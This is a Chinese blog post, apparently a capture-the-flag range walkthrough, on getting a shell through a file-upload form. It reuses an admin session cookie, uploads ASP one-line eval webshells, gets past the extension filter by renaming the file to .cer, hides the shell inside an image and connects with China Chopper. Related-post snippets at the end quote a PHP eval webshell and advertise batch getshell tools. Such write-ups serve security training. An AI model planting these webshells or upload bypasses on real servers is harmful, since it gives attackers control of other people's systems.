Get Shell! — 绕过防护上传木马

已于 2022-12-08 17:14:45 修改
阅读量776 收藏 1
点赞数
分类专栏: web安全 文章标签: 服务器 网络 linux
于 2022-11-14 22:41:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52108058/article/details/127854654
版权

文章目录

封神台四

一、原理

1、什么是Shell?

  • web的含义显然是需要服务器开放web服务
  • shell是一个人机交互页面
  • 拿shell的含义是取得对服务器/电脑某种程度上的操作权限
  • webshell拿到网站服务器的权限(shell)

木马可以帮助我们拿到shell,以达到控制网站服务器的目的,也有人称之为网站的后门工具。

2、一句话asp

<% eval request (“test”) %>
eval 执行
request 从用户那里取得信息

木马:执行从用户那里取得信息

3、木马原理

  1. 小马 特点:小 功能:上传大马
  2. 大马 特点:功能繁琐 功能:各种各样

二、探索

1、寻找上传点

能上传附件的地方
我们查看上一章获取到的管理员cookie
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC

1、将其添加到cookie中,刷新即可进入管理员用户(演示的是谷歌浏览器)
在这里插入图片描述
2、刷新后进入到管理员页面
在这里插入图片描述
3、可以发现产品管理处可以上传文件
在这里插入图片描述
4、尝试上传一张图片,可以通过地址访问到图片
在这里插入图片描述

2、上传一句话木马

1、创建一个2.asp文件,尝试上传
<%eval request(“chopper”)%>

2、发现文件被拦截
在这里插入图片描述
3、我们修改文件后缀为cer

为什么呢,存在默认配置错误,开始配置完存在默认的cer指向asp.dll后缀名,所以也可以被执行
修改了后缀上传后发现
在这里插入图片描述
发现是文件太小造成的
在这里插入图片描述
我们给他添加一些内容在上传,发现可以上传成功
在这里插入图片描述

3、图片马制作

准备一张图片1.jpg
带木马的文件 2.asp
通过指令行 合成一个 3.png
在这里插入图片描述

在这里插入图片描述

发现成功隐藏信息

在这里插入图片描述

4、菜刀连接

通过我们上传木马的网址,和request后面的密码即可连接到服务器
在这里插入图片描述
拿到flag
在这里插入图片描述

微笑伴你而行
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
通过双写绕过上传木马
shatianyzg的博客
05-19 95
通过双写绕过上传木马
木马——文件上传
欢迎大家一起成长
04-21 604
WebShell就是以网页文件形式(asp\php\jsp)存在的一种命令执行环境,客户端通过远程连接,利用W ebS h ell连接到服务器,并可对服务器进行操作。前提是后端一定可以解析这种环境。
文件上传漏洞:getshell的最好方式,我们如何防御?
李熠专用博客_白帽子一枚,人称低危终结者
09-09 2926
我相信,你在开发Web应用时,后端一定会提供文件的上传功能,比如前端页面肯定有图片的展示,后端必定会提供图片的上传入口。但是,你在做文件上传功能时,是否考虑过它的安全性问题呢? 请看下面的代码: @PostMapping("upload") public String upload(@RequestParam("file")MultipartFile file,HttpServletRequest request)throws Exception{ String filename = fil.
封神台-第5章 绕过防护上传木马
ploto_cs的博客
09-27 689
封神台-第5章 绕过防护上传木马 1.登录后台 获得了管理员的cookie后,去掉里面的flag部分,取出两个有效的键值对,把他们加到登录的cookie里就行了 键值对为ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在这个页面按F12 进入存储界面,更改name和value字段 将ADMINSESSIONIDCSTRCSDQ粘贴在Name下 将LBMLMBCCNPFINOANFGLPCFBC粘贴在value 修改成功后刷新点击“准备好了吗” 进入以下页
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 529
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
上传ASP木马
netidman的专栏
07-22 1048
 所谓ASP木马,就是一段有特殊功能的ASP代码,并放入WEB虚拟目录的Scripts下,远程客户通过IE就可执行它,进而得到系统的USER权限,实现对系统的初步控制。上传ASP木马一般有两种比较有效的方法:1、利用WEB的远程管理功能许多WEB站点,为了维护的方便,都提供了远程管理的功能;也有不少WEB站点,其内容是对于不同的用户有不同的访问权限。为了达到对用户权限的控制,都有一个网页,要求用户
ASP木马是如何上传防范方法
得峰的专栏 [网络收藏]
05-11 1269
 随着ASP 技术的发展,网络上基于ASP技术开发的网站越来越多,对ASP技术的支持可以说已经是windows系统IIS服务器的一项基本功能。但是基于ASP技术的木马后门,也越来越多,而且功能也越来越强大。由于ASP它本身是服务器提供的一贡服务功能,所以这种ASP脚本的木马后门,不会被杀毒软件查杀。被黑客们称为“永远不会被查杀的后门”。由于其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁
绕过安全狗Getshell
06-12
详细手把手教你如何绕过安全狗Getshell,新手一学就会
帆软报表绕过各种限制getshell.pdf
最新发布
04-22
帆软报表绕过各种限制getshell.pdf
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
ThinkPHP v5.x命令执行利用工具(可getshell
批量getshell工具新版
12-21
批量getshell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
文件上传一句话木马getshell
qq_41620273的博客
12-25 5517
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
PHP编程基础03---get&post 一句话木马
Z_l123的博客
12-03 2772
准备 1.下载火狐浏览器 2.安装HackBar插件 GitHub - HCTYMFF/hackbar2.1.3 下载后拖入即可 3.选择HackBar 4.关闭自动更新 get 1.编写一句话木马 <?php @eval($_GET['cmd']); ?> 2.用本机ip访问木马文件并查询ipconfig 3.若查询结果出现乱码 则在php中添加 header('Content-Type:text/html;charset=gbk'); ...
IIS的ASP木马怎么上传
xiuzhentianting的博客
09-14 1037
在 Windows 2003下 IIS 6.0有两个漏洞: IIS解析漏洞1:   在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。 IS解析漏洞2:   网站上传图片的时候,将
在网站管理系统上传木马文件 获得服务器权限
rang的博客
09-14 1144
在网站管理系统上传木马 获得服务器权限 1.上传文件 并找到
SQL注入与ASP木马上传
蓝法典的专栏
03-15 1562
SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。1、SQL注入的时候,用xp_cmdshell服务器上写入一个能写文件的asp文件。文件内容:Set objFSO = Server.createObject("Scripting.FileSystemObject")Set objCountFile=objFSO.createTextFile(request(
【用一句话木马文件上传漏洞挖掘实战】
m0_68563451的博客
03-03 1133
6.使用AntSword(中国蚁剑)管理工具连接一句话,注意连接密码就是一句话里的值。5.成功将一句话木马作为头像上传,右键点击查看图像,可以拿到图片路径。3.点击上传头像,将一句话木马改为图片形式上传,并开启bp抓包。4.在抓包代码中将".jpg"改为".php",返回抓包结果。#用一句话木马文件上传漏洞挖掘实战。1.点击新用户注册,注册一个用户。2.注册成功后点击我的个人资料。打开火狐浏览器,访问目标地址。
网络空间安全 +文件上传基础入门
11-09
本文将重点讨论网络空间安全中的文件上传漏洞以及如何进行绕过攻击。 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本获得了执行服务器端命令的能力。常见的场景是web服务器允许用户上传图片或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

微笑伴你而行

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值